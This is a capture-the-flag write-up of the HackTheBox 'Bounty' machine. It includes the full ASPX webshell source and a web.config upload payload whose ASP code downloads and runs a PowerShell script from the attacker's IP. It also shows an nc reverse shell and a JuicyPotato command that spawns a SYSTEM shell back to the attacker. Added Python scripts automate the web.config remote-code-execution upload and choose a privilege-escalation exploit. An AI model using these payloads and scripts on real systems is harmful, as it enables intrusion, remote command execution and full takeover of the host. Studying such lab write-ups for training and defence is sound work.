HTB:Bounty[WriteUP]
Connect to the HTB VPN and start the target machine
Target IP: 10.10.10.93
Attacker IP: 10.10.16.21
Information Gathering
Scan all TCP ports on the target with rustscan
rustscan -a 10.10.10.93 -r 1-65535 --ulimit 5000 | tee res
Run nmap default-script and service/version detection against the open TCP ports
nmap -sT -p80 -sCV -Pn 10.10.10.93
Run nmap vulnerability scripts and OS detection against the open TCP ports
nmap -sT -p80 --script=vuln -O -Pn 10.10.10.93
Scan the most common UDP ports on the target with nmap
nmap -sU --top-ports 20 -Pn 10.10.10.93
Map the target IP to the main hostname in /etc/hosts
sed -i '1i 10.10.10.93 bounty.htb' /etc/hosts
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# sed -i '1i 10.10.10.93 bounty.htb' /etc/hosts
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# head -n1 /etc/hosts
10.10.10.93 bounty.htb
Request the target hostname with curl and inspect the response headers
curl -I http://bounty.htb/
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# curl -I http://bounty.htb/
HTTP/1.1 200 OK
Content-Length: 630
Content-Type: text/html
Last-Modified: Thu, 31 May 2018 03:46:26 GMT
Accept-Ranges: bytes
ETag: "20ba8ef391f8d31:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 19 Jan 2025 06:50:44 GMT
Fuzz directories and files on the target with gobuster
gobuster dir -u http://bounty.htb -w ../dictionary/Entire-Dir.txt -x php,jsp,asp,aspx -t 200
Continue fuzzing for files under the uploadedfiles path with gobuster
gobuster dir -u http://bounty.htb/uploadedfiles -w ../dictionary/Entire-Dir.txt -x php,jsp,asp,aspx -t 200
Fuzz subdomains of the target with ffuf
ffuf -u http://bounty.htb -H 'Host: FUZZ.bounty.htb' -w ../dictionary/subdomains-top20000.txt -fw 25
Foothold
Use the Wappalyzer extension to inspect the target's web technology stack
Open /transfer.aspx in the browser
- Locate the ASPX webshell that ships with Kali (/usr/share/webshells/aspx/cmdasp.aspx)
<%@ Page Language="C#" Debug="true" Trace="false" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<script Language="c#" runat="server">
void Page_Load(object sender, EventArgs e)
{
}
string ExcuteCmd(string arg)
{
ProcessStartInfo psi = new ProcessStartInfo();
psi.FileName = "cmd.exe";
psi.Arguments = "/c "+arg;
psi.RedirectStandardOutput = true;
psi.UseShellExecute = false;
Process p = Process.Start(psi);
StreamReader stmrdr = p.StandardOutput;
string s = stmrdr.ReadToEnd();
stmrdr.Close();
return s;
}
void cmdExe_Click(object sender, System.EventArgs e)
{
Response.Write("<pre>");
Response.Write(Server.HtmlEncode(ExcuteCmd(txtArg.Text)));
Response.Write("</pre>");
}
</script>
<HTML>
<HEAD>
<title>awen asp.net webshell</title>
</HEAD>
<body >
<form id="cmd" method="post" runat="server">
<asp:TextBox id="txtArg" style="Z-INDEX: 101; LEFT: 405px; POSITION: absolute; TOP: 20px" runat="server" Width="250px"></asp:TextBox>
<asp:Button id="testing" style="Z-INDEX: 102; LEFT: 675px; POSITION: absolute; TOP: 18px" runat="server" Text="excute" OnClick="cmdExe_Click"></asp:Button>
<asp:Label id="lblText" style="Z-INDEX: 103; LEFT: 310px; POSITION: absolute; TOP: 22px" runat="server">Command:</asp:Label>
</form>
</body>
</HTML>
<!-- Contributed by Dominic Chell (http://digitalapocalypse.blogspot.com/) -->
<!-- http://michaeldaw.org 04/2007 -->
- Uploading it returns: `Invalid File. Please try again`
Try a %00 null-byte truncation in the webshell's file extension
- The upload is reported as successful
- Browse to the webshell just uploaded
- The response shows the file was stored but IIS does not execute it. Since the server is IIS 7.5, I try the web.config trick instead: IIS reads a web.config placed in the upload directory, and a handler mapping that sends *.config to asp.dll makes IIS run the classic ASP code appended after the XML
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.webServer>
<handlers accessPolicy="Read, Script, Write">
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
</handlers>
<security>
<requestFiltering>
<fileExtensions>
<remove fileExtension=".config" />
</fileExtensions>
<hiddenSegments>
<remove segment="web.config" />
</hiddenSegments>
</requestFiltering>
</security>
</system.webServer>
</configuration>
<%
CreateObject("WScript.Shell").Exec("cmd /c powershell IEX(New-Object Net.WebClient).DownloadString('http://10.10.16.21:6666/1.ps1')")
%>
- Because the upload filter places no restriction on .config files, the file uploads successfully. The 1.ps1 referenced in the payload is a PowerShell reverse-shell script (not shown in this writeup) served from a web server on the attacker's port 6666; it must connect back to the listener started below
Start an nc listener on the attacker machine
rlwrap -cAr nc -lvnp 1425
Request the uploaded web.config with curl to trigger the handler
curl -s http://bounty.htb/uploadedfiles/web.config
The nc listener on the attacker machine receives the shell
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# rlwrap -cAr nc -lvnp 1425
listening on [any] 1425 ...
connect to [10.10.16.21] from (UNKNOWN) [10.10.10.93] 49160
PS C:\windows\system32\inetsrv> whoami
bounty\merlin
- user.txt is found in C:\Users\merlin\Desktop
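The upload-and-trigger procedure above, automated as an added example (this is not code from the original writeup). Two things are assumed rather than taken from the page: the WebForms field names FileUpload1 and btnUpload (adjust them to whatever /transfer.aspx really uses), and the ASP block, which is a query-driven variant of the page's payload that runs the command in ?c= and echoes its output instead of blindly downloading a script. The sample form HTML is constructed. The practical point it shows is that an ASP.NET upload page is a postback: __VIEWSTATE and __EVENTVALIDATION must be read from the form and sent back, or the server discards the POST, and the XML half of the payload must parse cleanly or IIS answers 500 and nothing executes.

```python
"""Added example (not from the original writeup): build the IIS web.config RCE
payload and upload it through an ASP.NET WebForms page.  Assumed, not taken
from the page: the file input is named "FileUpload1" and the submit button
"btnUpload" (adjust to /transfer.aspx's real names); the ASP block is the
query-driven variant of the page's payload and echoes command output."""
import sys, uuid, urllib.request
import xml.etree.ElementTree as ET
from html.parser import HTMLParser

# XML half: map *.config to the classic-ASP engine and undo the request
# filtering that would otherwise refuse to serve web.config at all.
WEB_CONFIG_TEMPLATE = (
    '<?xml version="1.0" encoding="UTF-8"?>\n<configuration>\n  <system.webServer>\n'
    '    <handlers accessPolicy="Read, Script, Write">\n'
    '      <add name="web_config" path="*.config" verb="*" modules="IsapiModule"\n'
    '           scriptProcessor="%windir%\\system32\\inetsrv\\asp.dll"\n'
    '           resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />\n'
    "    </handlers>\n    <security>\n      <requestFiltering>\n"
    '        <fileExtensions><remove fileExtension=".config" /></fileExtensions>\n'
    '        <hiddenSegments><remove segment="web.config" /></hiddenSegments>\n'
    "      </requestFiltering>\n    </security>\n  </system.webServer>\n</configuration>\n"
)
# ASP half (VBScript): run ?c= through cmd.exe and return its stdout.
CMD_ASP_BLOCK = (
    '<%\nSet sh = CreateObject("WScript.Shell")\n'
    'Set ex = sh.Exec("cmd /c " & Request.QueryString("c"))\n'
    'Response.Write("<pre>" & Server.HTMLEncode(ex.StdOut.ReadAll()) & "</pre>")\n%>\n'
)
# Constructed WebForms upload page standing in for a real GET /transfer.aspx.
SAMPLE_FORM_HTML = """\
<form method="post" action="./transfer.aspx" id="form1" enctype="multipart/form-data">
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUK" />
<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" />
<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEdAAK" />
<input type="file" name="FileUpload1" id="FileUpload1" />
<input type="submit" name="btnUpload" value="Upload" id="btnUpload" />
</form>"""

def build_web_config(asp_block=CMD_ASP_BLOCK):
    """Full payload: well-formed XML followed by the ASP block."""
    return WEB_CONFIG_TEMPLATE + asp_block

def validate_web_config(payload):
    """Pre-upload check: XML must parse, handler and extension override must be present."""
    xml_part, sep, asp_part = payload.partition("<%")
    if not sep or "%>" not in asp_part:
        return False
    try:
        root = ET.fromstring(xml_part)
    except ET.ParseError:
        return False
    handler = root.find("./system.webServer/handlers/add")
    ext = root.find("./system.webServer/security/requestFiltering/fileExtensions/remove")
    return (handler is not None and handler.get("path") == "*.config"
            and ext is not None and ext.get("fileExtension") == ".config")

class _HiddenInputs(HTMLParser):
    # WebForms postback state (__VIEWSTATE, __EVENTVALIDATION, ...) must be
    # echoed back, otherwise the server rejects the POST and stores nothing.
    def __init__(self):
        super().__init__()
        self.fields = {}
    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag.lower() == "input" and a.get("type", "").lower() == "hidden" and a.get("name"):
            self.fields[a["name"]] = a.get("value", "")

def extract_hidden_fields(html):
    p = _HiddenInputs()
    p.feed(html)
    return p.fields

def encode_multipart(fields, file_field, filename, content, content_type="application/octet-stream"):
    """Hand-rolled multipart/form-data; returns (body, Content-Type header value)."""
    boundary = "----Boundary" + uuid.uuid4().hex[:16]
    b, parts = boundary.encode(), []
    for name, value in fields.items():
        parts.append(b"--" + b + b'\r\nContent-Disposition: form-data; name="'
                     + name.encode() + b'"\r\n\r\n' + value.encode() + b"\r\n")
    parts.append(b"--" + b + b'\r\nContent-Disposition: form-data; name="' + file_field.encode()
                 + b'"; filename="' + filename.encode() + b'"\r\nContent-Type: '
                 + content_type.encode() + b"\r\n\r\n" + content + b"\r\n--" + b + b"--\r\n")
    return b"".join(parts), "multipart/form-data; boundary=" + boundary

def upload_web_config(base_url, form_path="/transfer.aspx", file_field="FileUpload1", submit_field="btnUpload"):
    """GET the form, replay its hidden fields, POST the payload as web.config."""
    form_url = base_url.rstrip("/") + form_path
    with urllib.request.urlopen(form_url, timeout=15) as r:
        fields = extract_hidden_fields(r.read().decode("utf-8", "replace"))
    fields[submit_field] = "Upload"
    payload = build_web_config()
    if not validate_web_config(payload):
        raise ValueError("payload failed self-validation")
    body, ctype = encode_multipart(fields, file_field, "web.config", payload.encode())
    req = urllib.request.Request(form_url, data=body, headers={"Content-Type": ctype})
    with urllib.request.urlopen(req, timeout=15) as r:
        return r.read().decode("utf-8", "replace")

if __name__ == "__main__":  # usage: python3 webconfig_rce.py http://bounty.htb
    print("offline check:", validate_web_config(build_web_config()), extract_hidden_fields(SAMPLE_FORM_HTML))
    if len(sys.argv) > 1:
        print(upload_web_config(sys.argv[1])[:300])
```

After the upload, trigger it with `curl 'http://bounty.htb/uploadedfiles/web.config?c=whoami'`; the command output comes back inside the echoed XML. Note the handler carries `preCondition="bitness64"`, so it is silently skipped in a 32-bit application pool: if the request returns the file verbatim instead of command output, drop that attribute and re-upload.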
Privilege Escalation
Check the target's system information
systeminfo
- The system is Windows Server 2008 R2 x64 with no patches installed
List the user accounts on the target
net user
PS C:\windows\system32\inetsrv> net user
User accounts for \\BOUNTY
-------------------------------------------------------------------------------
Administrator Guest merlin
The command completed successfully.
Check the current user's account details
net user merlin
Check the current user's token privileges
whoami /priv
- The output shows the current user holds SeAssignPrimaryTokenPrivilege and SeImpersonatePrivilege, both of which allow token-impersonation (Potato-family) privilege escalation
Change to the default Microsoft.NET installation path
cd C:\Windows\Microsoft.NET\Framework
- The directory listing shows the .NET Framework installed on the target is version 2.0
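The triage done by hand in the systeminfo and whoami /priv steps above, as an added example that is not part of the original writeup: parse both outputs and decide which impersonation primitive fits the host. The two text samples are constructed to resemble a Server 2008 R2 RTM box and are not the writeup's own output; the build cut-off encodes the known fact that JuicyPotato stops working from Windows 10 1809 / Server 2019 (build 17763), where PrintSpoofer or RoguePotato are needed instead. One caveat worth seeing in code: only the presence of the privilege matters, because the exploit enables a Disabled privilege itself through AdjustTokenPrivileges.

```python
"""Added example (not from the original writeup): triage `whoami /priv` and
`systeminfo` output to pick a token-impersonation primitive.  Both samples
below are constructed, not copied from the target."""
import re

# Constructed `whoami /priv` for an IIS application-pool identity.
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

# Constructed `systeminfo` excerpt (only the lines the parser reads).
SAMPLE_SYSTEMINFO = """\
Host Name:                 BOUNTY
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter
OS Version:                6.1.7600 N/A Build 7600
System Type:               x64-based PC
Hotfix(s):                 N/A
"""

IMPERSONATION_PRIVS = ("SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege")
JUICY_FIRST_BROKEN_BUILD = 17763  # Windows 10 1809 / Server 2019: DCOM changes break JuicyPotato

def parse_privileges(text):
    """Map privilege name -> 'Enabled' / 'Disabled' from `whoami /priv` output."""
    privs = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) >= 3 and parts[0].startswith("Se") and parts[-1] in ("Enabled", "Disabled"):
            privs[parts[0]] = parts[-1]
    return privs

def parse_systeminfo(text):
    """Return (os_name, build_number, hotfix_count) from `systeminfo` output.
    'Hotfix(s): N/A' means no updates at all, i.e. an RTM install."""
    name = re.search(r"^OS Name:\s+(.+?)\s*$", text, re.M)
    ver = re.search(r"^OS Version:\s+\d+\.\d+\.(\d+)", text, re.M)
    hot = re.search(r"^Hotfix\(s\):\s+(N/A|(\d+) Hotfix)", text, re.M)
    build = int(ver.group(1)) if ver else 0
    hotfixes = 0 if not hot or hot.group(1) == "N/A" else int(hot.group(2))
    return (name.group(1) if name else "", build, hotfixes)

def potato_candidates(privs, build):
    """Only *presence* of an impersonation privilege matters: a 'Disabled'
    state is flipped by the exploit via AdjustTokenPrivileges, so do not
    discard SeAssignPrimaryTokenPrivilege just because whoami shows it disabled."""
    if not any(p in privs for p in IMPERSONATION_PRIVS):
        return []
    if build < JUICY_FIRST_BROKEN_BUILD:
        return ["JuicyPotato"]
    # Newer builds: abuse the Spooler named pipe (PrintSpoofer) or redirect
    # the OXID resolver to a controlled host (RoguePotato) instead.
    return ["PrintSpoofer", "RoguePotato"]

def triage(whoami_text, systeminfo_text):
    """One-shot summary of what the two commands tell us."""
    privs = parse_privileges(whoami_text)
    os_name, build, hotfixes = parse_systeminfo(systeminfo_text)
    return {"os": os_name, "build": build, "hotfixes": hotfixes,
            "impersonation_privs": sorted(p for p in privs if p in IMPERSONATION_PRIVS),
            "candidates": potato_candidates(privs, build)}

if __name__ == "__main__":
    print(triage(SAMPLE_WHOAMI_PRIV, SAMPLE_SYSTEMINFO))
```

On the constructed samples the result is build 7600, zero hotfixes, both impersonation privileges present and JuicyPotato as the candidate, which is exactly the path taken below.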
Start an SMB server on the attacker machine with impacket-smbserver
impacket-smbserver temp . -smb2support
On the target, map the attacker's SMB share to drive Z:
net use Z: \\10.10.16.21\temp
- Run JuicyPotato straight from the mapped share (which holds JuicyPotato.exe and nc.exe) to spawn an nc reverse shell as SYSTEM
.\JuicyPotato.exe -t * -l 8888 -p nc.exe -a "-e cmd 10.10.16.21 1426"
- The nc listener on the attacker machine receives the shell
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# rlwrap -cAr nc -lvnp 1426
listening on [any] 1426 ...
connect to [10.10.16.21] from (UNKNOWN) [10.10.10.93] 49194
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\>whoami
whoami
nt authority\system
- root.txt is found in C:\Users\Administrator\Desktop
Original post: https://blog.csdn.net/qq_43007452/article/details/145230986